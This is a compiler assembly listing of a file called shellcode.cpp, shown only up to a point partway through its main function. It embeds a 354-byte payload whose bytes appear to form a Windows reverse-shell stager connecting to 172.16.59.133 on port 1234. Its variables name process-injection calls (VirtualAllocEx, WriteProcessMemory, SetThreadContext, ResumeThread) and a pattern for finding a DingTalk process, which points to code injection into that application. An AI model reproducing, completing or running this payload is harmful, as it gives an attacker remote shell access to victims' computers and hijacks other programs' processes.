; Listing generated by Microsoft (R) Optimizing Compiler Version 19.16.27045.0 

	TITLE	C:\Users\Ronpa\Desktop\shellcode\shellcode\shellcode.cpp
	.686P
	.XMM
	include listing.inc
	.model	flat

;INCLUDELIB LIBCMT
;INCLUDELIB OLDNAMES

PUBLIC	?kernel32_str@@3PA_WA				; kernel32_str
PUBLIC	?load_lib_str@@3PADA				; load_lib_str
_TEXT	SEGMENT
AlignRSP PROC
    push esi ; Preserve RSI since we're stomping on it
    mov esi, esp ; Save the value of RSP so it can be restored
    and esp, 0FFFFFFF0h ; Align RSP to 16 bytes
    sub esp, 020h ; Allocate homing space for ExecutePayload
    call _main ; Call the entry point of the payload
    mov esp, esi ; Restore the original value of RSP
    pop esi ; Restore RSI
    ret ; Return to caller
AlignRSP ENDP
?load_lib_str@@3PADA DB 'LoadLibraryA', 00H		; load_lib_str
	ORG $+3
?kernel32_str@@3PA_WA DB 'k', 00H, 'e', 00H, 'r', 00H, 'n', 00H, 'e', 00H
	DB	'l', 00H, '3', 00H, '2', 00H, '.', 00H, 'd', 00H, 'l', 00H, 'l'
	DB	00H, 00H, 00H				; kernel32_str
_TEXT	ENDS
PUBLIC	?get_module_by_name@@YAPAXPA_W@Z		; get_module_by_name
PUBLIC	?get_func_by_name@@YAPAXPAXPAD@Z		; get_func_by_name
PUBLIC	_main
; Function compile flags: /Odtp
_TEXT	SEGMENT
_lpContext$ = -2428					; size = 716
_peb$1 = -1712						; size = 472
_Param$2 = -1240					; size = 72
_pbi$ = -1168						; size = 24
_threadHandle$ = -1144					; size = 4
__LoadLibraryA$ = -1140					; size = 4
__GetCurrentProcess$ = -1136				; size = 4
_threadEntry$ = -1132					; size = 28
_dwPatternLength$ = -1104				; size = 4
_fn_WriteProcessMemory$ = -1100				; size = 4
_fn_ResumeThread$ = -1096				; size = 4
_fn_SetThreadContext$ = -1092				; size = 4
_fn_GetThreadContext$ = -1088				; size = 4
_fn_CreateToolhelp32Snapshot$ = -1084			; size = 4
_fn_Thread32First$ = -1080				; size = 4
_fn_SuspendThread$ = -1076				; size = 4
_fn_OpenThread$ = -1072					; size = 4
_Tid$ = -1068						; size = 4
_fn_Thread32Next$ = -1064				; size = 4
_usPathLen$ = -1060					; size = 2
_usCmdLen$ = -1056					; size = 2
_uReturnedLEngth$ = -1052				; size = 4
_usPathLen$3 = -1048					; size = 2
_usCmdLen$4 = -1044					; size = 2
_fn_VirtualAllocEx$ = -1040				; size = 4
_fNtQuerySystemInformation$ = -1036			; size = 4
_status$ = -1032					; size = 4
_fNtQueryInformationProcess$ = -1028			; size = 4
_status2$5 = -1024					; size = 4
_dingtalk_pattern$ = -1020				; size = 54
_dingtalk$ = -964					; size = 26
_kernel32_dll_name$ = -936				; size = 26
_dingtalk_upper$ = -908					; size = 26
_get_proc$ = -880					; size = 4
__GetModuleHandleA$ = -876				; size = 4
_isDingtalk$6 = -872					; size = 4
__VirtualAlloc$ = -868					; size = 4
__VirtualFree$ = -864					; size = 4
__OpenProcess$ = -860					; size = 4
_load_lib$ = -856					; size = 4
_TargetProcess$ = -852					; size = 4
_bMatch$7 = -848					; size = 4
_AllocMemory$ = -844					; size = 4
_hThreadSnap$ = -840					; size = 4
_CreateRemoteThread_name$ = -836			; size = 19
_dwID$ = -816						; size = 4
__ReadProcessMemory$ = -812				; size = 4
_dwBufferLength$8 = -808				; size = 4
_shellcode$ = -804					; size = 354
_nt_query_information_process_name$ = -448		; size = 26
_nt_query_system_information_name$ = -420		; size = 25
_CreateToolhelp32Snapshot_name$ = -392			; size = 25
_WriteProcessMemory_name$ = -364			; size = 19
_get_current_process_name$ = -344			; size = 18
_read_process_memory_name$ = -324			; size = 18
_get_module_handlea_name$ = -304			; size = 17
_GetThreadContext_name$ = -284				; size = 17
_SetThreadContext_name$ = -264				; size = 17
_get_proc_name$ = -244					; size = 15
_VirtualAllocEx_name$ = -228				; size = 15
_SuspendThread_name$ = -212				; size = 14
_Thread32First_name$ = -196				; size = 14
_load_lib_name$ = -180					; size = 13
_virtual_alloc_name$ = -164				; size = 13
_ResumeThread_name$ = -148				; size = 13
_Thread32Next_name$ = -132				; size = 13
_open_process_name$ = -116				; size = 12
_virtual_free_name$ = -104				; size = 12
_open_thread_name$ = -92				; size = 11
_ntdll_name$ = -80					; size = 10
_nParamIndex$9 = -68					; size = 4
_nPebIndex$10 = -64					; size = 4
_pImageName$ = -60					; size = 4
_hThread$ = -56						; size = 4
_pInfo$ = -52						; size = 4
_pIndexOfCmdLine$11 = -48				; size = 4
_nByteIndex$12 = -44					; size = 4
_pCmdLine$13 = -40					; size = 4
_nCount$14 = -36					; size = 4
_dwNetWorkInstPID$ = -32				; size = 4
_hProcess$ = -28					; size = 4
_nImageNameLength$ = -24				; size = 4
_nIndex$15 = -20					; size = 4
_dwRead$16 = -16					; size = 4
_pSystemInformation$ = -12				; size = 4
__GetProcAddress$ = -8					; size = 4
_base$ = -4						; size = 4
_main	PROC
; File c:\users\ronpa\desktop\shellcode\shellcode\shellcode.cpp
; Line 91
	push	ebp
	mov	ebp, esp
	sub	esp, 2428				; 0000097cH
; Line 93
	mov	BYTE PTR _shellcode$[ebp], 252		; 000000fcH
	mov	BYTE PTR _shellcode$[ebp+1], 232	; 000000e8H
	mov	BYTE PTR _shellcode$[ebp+2], 143	; 0000008fH
	mov	BYTE PTR _shellcode$[ebp+3], 0
	mov	BYTE PTR _shellcode$[ebp+4], 0
	mov	BYTE PTR _shellcode$[ebp+5], 0
	mov	BYTE PTR _shellcode$[ebp+6], 96		; 00000060H
	mov	BYTE PTR _shellcode$[ebp+7], 137	; 00000089H
	mov	BYTE PTR _shellcode$[ebp+8], 229	; 000000e5H
	mov	BYTE PTR _shellcode$[ebp+9], 49		; 00000031H
	mov	BYTE PTR _shellcode$[ebp+10], 210	; 000000d2H
	mov	BYTE PTR _shellcode$[ebp+11], 100	; 00000064H
	mov	BYTE PTR _shellcode$[ebp+12], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+13], 82	; 00000052H
	mov	BYTE PTR _shellcode$[ebp+14], 48	; 00000030H
; Line 94
	mov	BYTE PTR _shellcode$[ebp+15], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+16], 82	; 00000052H
	mov	BYTE PTR _shellcode$[ebp+17], 12	; 0000000cH
	mov	BYTE PTR _shellcode$[ebp+18], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+19], 82	; 00000052H
	mov	BYTE PTR _shellcode$[ebp+20], 20	; 00000014H
	mov	BYTE PTR _shellcode$[ebp+21], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+22], 114	; 00000072H
	mov	BYTE PTR _shellcode$[ebp+23], 40	; 00000028H
	mov	BYTE PTR _shellcode$[ebp+24], 15	; 0000000fH
	mov	BYTE PTR _shellcode$[ebp+25], 183	; 000000b7H
	mov	BYTE PTR _shellcode$[ebp+26], 74	; 0000004aH
	mov	BYTE PTR _shellcode$[ebp+27], 38	; 00000026H
	mov	BYTE PTR _shellcode$[ebp+28], 49	; 00000031H
	mov	BYTE PTR _shellcode$[ebp+29], 255	; 000000ffH
; Line 95
	mov	BYTE PTR _shellcode$[ebp+30], 49	; 00000031H
	mov	BYTE PTR _shellcode$[ebp+31], 192	; 000000c0H
	mov	BYTE PTR _shellcode$[ebp+32], 172	; 000000acH
	mov	BYTE PTR _shellcode$[ebp+33], 60	; 0000003cH
	mov	BYTE PTR _shellcode$[ebp+34], 97	; 00000061H
	mov	BYTE PTR _shellcode$[ebp+35], 124	; 0000007cH
	mov	BYTE PTR _shellcode$[ebp+36], 2
	mov	BYTE PTR _shellcode$[ebp+37], 44	; 0000002cH
	mov	BYTE PTR _shellcode$[ebp+38], 32	; 00000020H
	mov	BYTE PTR _shellcode$[ebp+39], 193	; 000000c1H
	mov	BYTE PTR _shellcode$[ebp+40], 207	; 000000cfH
	mov	BYTE PTR _shellcode$[ebp+41], 13	; 0000000dH
	mov	BYTE PTR _shellcode$[ebp+42], 1
	mov	BYTE PTR _shellcode$[ebp+43], 199	; 000000c7H
	mov	BYTE PTR _shellcode$[ebp+44], 73	; 00000049H
; Line 96
	mov	BYTE PTR _shellcode$[ebp+45], 117	; 00000075H
	mov	BYTE PTR _shellcode$[ebp+46], 239	; 000000efH
	mov	BYTE PTR _shellcode$[ebp+47], 82	; 00000052H
	mov	BYTE PTR _shellcode$[ebp+48], 87	; 00000057H
	mov	BYTE PTR _shellcode$[ebp+49], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+50], 82	; 00000052H
	mov	BYTE PTR _shellcode$[ebp+51], 16	; 00000010H
	mov	BYTE PTR _shellcode$[ebp+52], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+53], 66	; 00000042H
	mov	BYTE PTR _shellcode$[ebp+54], 60	; 0000003cH
	mov	BYTE PTR _shellcode$[ebp+55], 1
	mov	BYTE PTR _shellcode$[ebp+56], 208	; 000000d0H
	mov	BYTE PTR _shellcode$[ebp+57], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+58], 64	; 00000040H
	mov	BYTE PTR _shellcode$[ebp+59], 120	; 00000078H
; Line 97
	mov	BYTE PTR _shellcode$[ebp+60], 133	; 00000085H
	mov	BYTE PTR _shellcode$[ebp+61], 192	; 000000c0H
	mov	BYTE PTR _shellcode$[ebp+62], 116	; 00000074H
	mov	BYTE PTR _shellcode$[ebp+63], 76	; 0000004cH
	mov	BYTE PTR _shellcode$[ebp+64], 1
	mov	BYTE PTR _shellcode$[ebp+65], 208	; 000000d0H
	mov	BYTE PTR _shellcode$[ebp+66], 80	; 00000050H
	mov	BYTE PTR _shellcode$[ebp+67], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+68], 88	; 00000058H
	mov	BYTE PTR _shellcode$[ebp+69], 32	; 00000020H
	mov	BYTE PTR _shellcode$[ebp+70], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+71], 72	; 00000048H
	mov	BYTE PTR _shellcode$[ebp+72], 24	; 00000018H
	mov	BYTE PTR _shellcode$[ebp+73], 1
	mov	BYTE PTR _shellcode$[ebp+74], 211	; 000000d3H
; Line 98
	mov	BYTE PTR _shellcode$[ebp+75], 133	; 00000085H
	mov	BYTE PTR _shellcode$[ebp+76], 201	; 000000c9H
	mov	BYTE PTR _shellcode$[ebp+77], 116	; 00000074H
	mov	BYTE PTR _shellcode$[ebp+78], 60	; 0000003cH
	mov	BYTE PTR _shellcode$[ebp+79], 49	; 00000031H
	mov	BYTE PTR _shellcode$[ebp+80], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+81], 73	; 00000049H
	mov	BYTE PTR _shellcode$[ebp+82], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+83], 52	; 00000034H
	mov	BYTE PTR _shellcode$[ebp+84], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+85], 1
	mov	BYTE PTR _shellcode$[ebp+86], 214	; 000000d6H
	mov	BYTE PTR _shellcode$[ebp+87], 49	; 00000031H
	mov	BYTE PTR _shellcode$[ebp+88], 192	; 000000c0H
	mov	BYTE PTR _shellcode$[ebp+89], 193	; 000000c1H
; Line 99
	mov	BYTE PTR _shellcode$[ebp+90], 207	; 000000cfH
	mov	BYTE PTR _shellcode$[ebp+91], 13	; 0000000dH
	mov	BYTE PTR _shellcode$[ebp+92], 172	; 000000acH
	mov	BYTE PTR _shellcode$[ebp+93], 1
	mov	BYTE PTR _shellcode$[ebp+94], 199	; 000000c7H
	mov	BYTE PTR _shellcode$[ebp+95], 56	; 00000038H
	mov	BYTE PTR _shellcode$[ebp+96], 224	; 000000e0H
	mov	BYTE PTR _shellcode$[ebp+97], 117	; 00000075H
	mov	BYTE PTR _shellcode$[ebp+98], 244	; 000000f4H
	mov	BYTE PTR _shellcode$[ebp+99], 3
	mov	BYTE PTR _shellcode$[ebp+100], 125	; 0000007dH
	mov	BYTE PTR _shellcode$[ebp+101], 248	; 000000f8H
	mov	BYTE PTR _shellcode$[ebp+102], 59	; 0000003bH
	mov	BYTE PTR _shellcode$[ebp+103], 125	; 0000007dH
	mov	BYTE PTR _shellcode$[ebp+104], 36	; 00000024H
; Line 100
	mov	BYTE PTR _shellcode$[ebp+105], 117	; 00000075H
	mov	BYTE PTR _shellcode$[ebp+106], 224	; 000000e0H
	mov	BYTE PTR _shellcode$[ebp+107], 88	; 00000058H
	mov	BYTE PTR _shellcode$[ebp+108], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+109], 88	; 00000058H
	mov	BYTE PTR _shellcode$[ebp+110], 36	; 00000024H
	mov	BYTE PTR _shellcode$[ebp+111], 1
	mov	BYTE PTR _shellcode$[ebp+112], 211	; 000000d3H
	mov	BYTE PTR _shellcode$[ebp+113], 102	; 00000066H
	mov	BYTE PTR _shellcode$[ebp+114], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+115], 12	; 0000000cH
	mov	BYTE PTR _shellcode$[ebp+116], 75	; 0000004bH
	mov	BYTE PTR _shellcode$[ebp+117], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+118], 88	; 00000058H
	mov	BYTE PTR _shellcode$[ebp+119], 28	; 0000001cH
; Line 101
	mov	BYTE PTR _shellcode$[ebp+120], 1
	mov	BYTE PTR _shellcode$[ebp+121], 211	; 000000d3H
	mov	BYTE PTR _shellcode$[ebp+122], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+123], 4
	mov	BYTE PTR _shellcode$[ebp+124], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+125], 1
	mov	BYTE PTR _shellcode$[ebp+126], 208	; 000000d0H
	mov	BYTE PTR _shellcode$[ebp+127], 137	; 00000089H
	mov	BYTE PTR _shellcode$[ebp+128], 68	; 00000044H
	mov	BYTE PTR _shellcode$[ebp+129], 36	; 00000024H
	mov	BYTE PTR _shellcode$[ebp+130], 36	; 00000024H
	mov	BYTE PTR _shellcode$[ebp+131], 91	; 0000005bH
	mov	BYTE PTR _shellcode$[ebp+132], 91	; 0000005bH
	mov	BYTE PTR _shellcode$[ebp+133], 97	; 00000061H
	mov	BYTE PTR _shellcode$[ebp+134], 89	; 00000059H
; Line 102
	mov	BYTE PTR _shellcode$[ebp+135], 90	; 0000005aH
	mov	BYTE PTR _shellcode$[ebp+136], 81	; 00000051H
	mov	BYTE PTR _shellcode$[ebp+137], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+138], 224	; 000000e0H
	mov	BYTE PTR _shellcode$[ebp+139], 88	; 00000058H
	mov	BYTE PTR _shellcode$[ebp+140], 95	; 0000005fH
	mov	BYTE PTR _shellcode$[ebp+141], 90	; 0000005aH
	mov	BYTE PTR _shellcode$[ebp+142], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+143], 18	; 00000012H
	mov	BYTE PTR _shellcode$[ebp+144], 233	; 000000e9H
	mov	BYTE PTR _shellcode$[ebp+145], 128	; 00000080H
	mov	BYTE PTR _shellcode$[ebp+146], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+147], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+148], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+149], 93	; 0000005dH
; Line 103
	mov	BYTE PTR _shellcode$[ebp+150], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+151], 51	; 00000033H
	mov	BYTE PTR _shellcode$[ebp+152], 50	; 00000032H
	mov	BYTE PTR _shellcode$[ebp+153], 0
	mov	BYTE PTR _shellcode$[ebp+154], 0
	mov	BYTE PTR _shellcode$[ebp+155], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+156], 119	; 00000077H
	mov	BYTE PTR _shellcode$[ebp+157], 115	; 00000073H
	mov	BYTE PTR _shellcode$[ebp+158], 50	; 00000032H
	mov	BYTE PTR _shellcode$[ebp+159], 95	; 0000005fH
	mov	BYTE PTR _shellcode$[ebp+160], 84	; 00000054H
	mov	BYTE PTR _shellcode$[ebp+161], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+162], 76	; 0000004cH
	mov	BYTE PTR _shellcode$[ebp+163], 119	; 00000077H
	mov	BYTE PTR _shellcode$[ebp+164], 38	; 00000026H
; Line 104
	mov	BYTE PTR _shellcode$[ebp+165], 7
	mov	BYTE PTR _shellcode$[ebp+166], 137	; 00000089H
	mov	BYTE PTR _shellcode$[ebp+167], 232	; 000000e8H
	mov	BYTE PTR _shellcode$[ebp+168], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+169], 208	; 000000d0H
	mov	BYTE PTR _shellcode$[ebp+170], 184	; 000000b8H
	mov	BYTE PTR _shellcode$[ebp+171], 144	; 00000090H
	mov	BYTE PTR _shellcode$[ebp+172], 1
	mov	BYTE PTR _shellcode$[ebp+173], 0
	mov	BYTE PTR _shellcode$[ebp+174], 0
	mov	BYTE PTR _shellcode$[ebp+175], 41	; 00000029H
	mov	BYTE PTR _shellcode$[ebp+176], 196	; 000000c4H
	mov	BYTE PTR _shellcode$[ebp+177], 84	; 00000054H
	mov	BYTE PTR _shellcode$[ebp+178], 80	; 00000050H
	mov	BYTE PTR _shellcode$[ebp+179], 104	; 00000068H
; Line 105
	mov	BYTE PTR _shellcode$[ebp+180], 41	; 00000029H
	mov	BYTE PTR _shellcode$[ebp+181], 128	; 00000080H
	mov	BYTE PTR _shellcode$[ebp+182], 107	; 0000006bH
	mov	BYTE PTR _shellcode$[ebp+183], 0
	mov	BYTE PTR _shellcode$[ebp+184], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+185], 213	; 000000d5H
	mov	BYTE PTR _shellcode$[ebp+186], 106	; 0000006aH
	mov	BYTE PTR _shellcode$[ebp+187], 10	; 0000000aH
	mov	BYTE PTR _shellcode$[ebp+188], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+189], 172	; 000000acH
	mov	BYTE PTR _shellcode$[ebp+190], 16	; 00000010H
	mov	BYTE PTR _shellcode$[ebp+191], 59	; 0000003bH
	mov	BYTE PTR _shellcode$[ebp+192], 133	; 00000085H
	mov	BYTE PTR _shellcode$[ebp+193], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+194], 2
; Line 106
	mov	BYTE PTR _shellcode$[ebp+195], 0
	mov	BYTE PTR _shellcode$[ebp+196], 4
	mov	BYTE PTR _shellcode$[ebp+197], 210	; 000000d2H
	mov	BYTE PTR _shellcode$[ebp+198], 137	; 00000089H
	mov	BYTE PTR _shellcode$[ebp+199], 230	; 000000e6H
	mov	BYTE PTR _shellcode$[ebp+200], 80	; 00000050H
	mov	BYTE PTR _shellcode$[ebp+201], 80	; 00000050H
	mov	BYTE PTR _shellcode$[ebp+202], 80	; 00000050H
	mov	BYTE PTR _shellcode$[ebp+203], 80	; 00000050H
	mov	BYTE PTR _shellcode$[ebp+204], 64	; 00000040H
	mov	BYTE PTR _shellcode$[ebp+205], 80	; 00000050H
	mov	BYTE PTR _shellcode$[ebp+206], 64	; 00000040H
	mov	BYTE PTR _shellcode$[ebp+207], 80	; 00000050H
	mov	BYTE PTR _shellcode$[ebp+208], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+209], 234	; 000000eaH
; Line 107
	mov	BYTE PTR _shellcode$[ebp+210], 15	; 0000000fH
	mov	BYTE PTR _shellcode$[ebp+211], 223	; 000000dfH
	mov	BYTE PTR _shellcode$[ebp+212], 224	; 000000e0H
	mov	BYTE PTR _shellcode$[ebp+213], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+214], 213	; 000000d5H
	mov	BYTE PTR _shellcode$[ebp+215], 151	; 00000097H
	mov	BYTE PTR _shellcode$[ebp+216], 106	; 0000006aH
	mov	BYTE PTR _shellcode$[ebp+217], 16	; 00000010H
	mov	BYTE PTR _shellcode$[ebp+218], 86	; 00000056H
	mov	BYTE PTR _shellcode$[ebp+219], 87	; 00000057H
	mov	BYTE PTR _shellcode$[ebp+220], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+221], 153	; 00000099H
	mov	BYTE PTR _shellcode$[ebp+222], 165	; 000000a5H
	mov	BYTE PTR _shellcode$[ebp+223], 116	; 00000074H
	mov	BYTE PTR _shellcode$[ebp+224], 97	; 00000061H
; Line 108
	mov	BYTE PTR _shellcode$[ebp+225], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+226], 213	; 000000d5H
	mov	BYTE PTR _shellcode$[ebp+227], 133	; 00000085H
	mov	BYTE PTR _shellcode$[ebp+228], 192	; 000000c0H
	mov	BYTE PTR _shellcode$[ebp+229], 116	; 00000074H
	mov	BYTE PTR _shellcode$[ebp+230], 10	; 0000000aH
	mov	BYTE PTR _shellcode$[ebp+231], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+232], 78	; 0000004eH
	mov	BYTE PTR _shellcode$[ebp+233], 8
	mov	BYTE PTR _shellcode$[ebp+234], 117	; 00000075H
	mov	BYTE PTR _shellcode$[ebp+235], 236	; 000000ecH
	mov	BYTE PTR _shellcode$[ebp+236], 232	; 000000e8H
	mov	BYTE PTR _shellcode$[ebp+237], 103	; 00000067H
	mov	BYTE PTR _shellcode$[ebp+238], 0
	mov	BYTE PTR _shellcode$[ebp+239], 0
; Line 109
	mov	BYTE PTR _shellcode$[ebp+240], 0
	mov	BYTE PTR _shellcode$[ebp+241], 106	; 0000006aH
	mov	BYTE PTR _shellcode$[ebp+242], 0
	mov	BYTE PTR _shellcode$[ebp+243], 106	; 0000006aH
	mov	BYTE PTR _shellcode$[ebp+244], 4
	mov	BYTE PTR _shellcode$[ebp+245], 86	; 00000056H
	mov	BYTE PTR _shellcode$[ebp+246], 87	; 00000057H
	mov	BYTE PTR _shellcode$[ebp+247], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+248], 2
	mov	BYTE PTR _shellcode$[ebp+249], 217	; 000000d9H
	mov	BYTE PTR _shellcode$[ebp+250], 200	; 000000c8H
	mov	BYTE PTR _shellcode$[ebp+251], 95	; 0000005fH
	mov	BYTE PTR _shellcode$[ebp+252], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+253], 213	; 000000d5H
	mov	BYTE PTR _shellcode$[ebp+254], 131	; 00000083H
; Line 110
	mov	BYTE PTR _shellcode$[ebp+255], 248	; 000000f8H
	mov	BYTE PTR _shellcode$[ebp+256], 0
	mov	BYTE PTR _shellcode$[ebp+257], 126	; 0000007eH
	mov	BYTE PTR _shellcode$[ebp+258], 54	; 00000036H
	mov	BYTE PTR _shellcode$[ebp+259], 139	; 0000008bH
	mov	BYTE PTR _shellcode$[ebp+260], 54	; 00000036H
	mov	BYTE PTR _shellcode$[ebp+261], 106	; 0000006aH
	mov	BYTE PTR _shellcode$[ebp+262], 64	; 00000040H
	mov	BYTE PTR _shellcode$[ebp+263], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+264], 0
	mov	BYTE PTR _shellcode$[ebp+265], 16	; 00000010H
	mov	BYTE PTR _shellcode$[ebp+266], 0
	mov	BYTE PTR _shellcode$[ebp+267], 0
	mov	BYTE PTR _shellcode$[ebp+268], 86	; 00000056H
	mov	BYTE PTR _shellcode$[ebp+269], 106	; 0000006aH
; Line 111
	mov	BYTE PTR _shellcode$[ebp+270], 0
	mov	BYTE PTR _shellcode$[ebp+271], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+272], 88	; 00000058H
	mov	BYTE PTR _shellcode$[ebp+273], 164	; 000000a4H
	mov	BYTE PTR _shellcode$[ebp+274], 83	; 00000053H
	mov	BYTE PTR _shellcode$[ebp+275], 229	; 000000e5H
	mov	BYTE PTR _shellcode$[ebp+276], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+277], 213	; 000000d5H
	mov	BYTE PTR _shellcode$[ebp+278], 147	; 00000093H
	mov	BYTE PTR _shellcode$[ebp+279], 83	; 00000053H
	mov	BYTE PTR _shellcode$[ebp+280], 106	; 0000006aH
	mov	BYTE PTR _shellcode$[ebp+281], 0
	mov	BYTE PTR _shellcode$[ebp+282], 86	; 00000056H
	mov	BYTE PTR _shellcode$[ebp+283], 83	; 00000053H
	mov	BYTE PTR _shellcode$[ebp+284], 87	; 00000057H
; Line 112
	mov	BYTE PTR _shellcode$[ebp+285], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+286], 2
	mov	BYTE PTR _shellcode$[ebp+287], 217	; 000000d9H
	mov	BYTE PTR _shellcode$[ebp+288], 200	; 000000c8H
	mov	BYTE PTR _shellcode$[ebp+289], 95	; 0000005fH
	mov	BYTE PTR _shellcode$[ebp+290], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+291], 213	; 000000d5H
	mov	BYTE PTR _shellcode$[ebp+292], 131	; 00000083H
	mov	BYTE PTR _shellcode$[ebp+293], 248	; 000000f8H
	mov	BYTE PTR _shellcode$[ebp+294], 0
	mov	BYTE PTR _shellcode$[ebp+295], 125	; 0000007dH
	mov	BYTE PTR _shellcode$[ebp+296], 40	; 00000028H
	mov	BYTE PTR _shellcode$[ebp+297], 88	; 00000058H
	mov	BYTE PTR _shellcode$[ebp+298], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+299], 0
; Line 113
	mov	BYTE PTR _shellcode$[ebp+300], 64	; 00000040H
	mov	BYTE PTR _shellcode$[ebp+301], 0
	mov	BYTE PTR _shellcode$[ebp+302], 0
	mov	BYTE PTR _shellcode$[ebp+303], 106	; 0000006aH
	mov	BYTE PTR _shellcode$[ebp+304], 0
	mov	BYTE PTR _shellcode$[ebp+305], 80	; 00000050H
	mov	BYTE PTR _shellcode$[ebp+306], 104	; 00000068H
	mov	BYTE PTR _shellcode$[ebp+307], 11	; 0000000bH
	mov	BYTE PTR _shellcode$[ebp+308], 47	; 0000002fH
	mov	BYTE PTR _shellcode$[ebp+309], 15	; 0000000fH
	mov	BYTE PTR _shellcode$[ebp+310], 48	; 00000030H
	mov	BYTE PTR _shellcode$[ebp+311], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+312], 213	; 000000d5H
	mov	BYTE PTR _shellcode$[ebp+313], 87	; 00000057H
	mov	BYTE PTR _shellcode$[ebp+314], 104	; 00000068H
; Line 114
	mov	BYTE PTR _shellcode$[ebp+315], 117	; 00000075H
	mov	BYTE PTR _shellcode$[ebp+316], 110	; 0000006eH
	mov	BYTE PTR _shellcode$[ebp+317], 77	; 0000004dH
	mov	BYTE PTR _shellcode$[ebp+318], 97	; 00000061H
	mov	BYTE PTR _shellcode$[ebp+319], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+320], 213	; 000000d5H
	mov	BYTE PTR _shellcode$[ebp+321], 94	; 0000005eH
	mov	BYTE PTR _shellcode$[ebp+322], 94	; 0000005eH
	mov	BYTE PTR _shellcode$[ebp+323], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+324], 12	; 0000000cH
	mov	BYTE PTR _shellcode$[ebp+325], 36	; 00000024H
	mov	BYTE PTR _shellcode$[ebp+326], 15	; 0000000fH
	mov	BYTE PTR _shellcode$[ebp+327], 133	; 00000085H
	mov	BYTE PTR _shellcode$[ebp+328], 112	; 00000070H
	mov	BYTE PTR _shellcode$[ebp+329], 255	; 000000ffH
; Line 115
	mov	BYTE PTR _shellcode$[ebp+330], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+331], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+332], 233	; 000000e9H
	mov	BYTE PTR _shellcode$[ebp+333], 155	; 0000009bH
	mov	BYTE PTR _shellcode$[ebp+334], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+335], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+336], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+337], 1
	mov	BYTE PTR _shellcode$[ebp+338], 195	; 000000c3H
	mov	BYTE PTR _shellcode$[ebp+339], 41	; 00000029H
	mov	BYTE PTR _shellcode$[ebp+340], 198	; 000000c6H
	mov	BYTE PTR _shellcode$[ebp+341], 117	; 00000075H
	mov	BYTE PTR _shellcode$[ebp+342], 193	; 000000c1H
	mov	BYTE PTR _shellcode$[ebp+343], 195	; 000000c3H
	mov	BYTE PTR _shellcode$[ebp+344], 187	; 000000bbH
; Line 116
	mov	BYTE PTR _shellcode$[ebp+345], 240	; 000000f0H
	mov	BYTE PTR _shellcode$[ebp+346], 181	; 000000b5H
	mov	BYTE PTR _shellcode$[ebp+347], 162	; 000000a2H
	mov	BYTE PTR _shellcode$[ebp+348], 86	; 00000056H
	mov	BYTE PTR _shellcode$[ebp+349], 106	; 0000006aH
	mov	BYTE PTR _shellcode$[ebp+350], 0
	mov	BYTE PTR _shellcode$[ebp+351], 83	; 00000053H
	mov	BYTE PTR _shellcode$[ebp+352], 255	; 000000ffH
	mov	BYTE PTR _shellcode$[ebp+353], 213	; 000000d5H
; Line 117
	mov	eax, 107				; 0000006bH
	mov	WORD PTR _kernel32_dll_name$[ebp], ax
	mov	ecx, 101				; 00000065H
	mov	WORD PTR _kernel32_dll_name$[ebp+2], cx
	mov	edx, 114				; 00000072H
	mov	WORD PTR _kernel32_dll_name$[ebp+4], dx
	mov	eax, 110				; 0000006eH
	mov	WORD PTR _kernel32_dll_name$[ebp+6], ax
	mov	ecx, 101				; 00000065H
	mov	WORD PTR _kernel32_dll_name$[ebp+8], cx
	mov	edx, 108				; 0000006cH
	mov	WORD PTR _kernel32_dll_name$[ebp+10], dx
	mov	eax, 51					; 00000033H
	mov	WORD PTR _kernel32_dll_name$[ebp+12], ax
	mov	ecx, 50					; 00000032H
	mov	WORD PTR _kernel32_dll_name$[ebp+14], cx
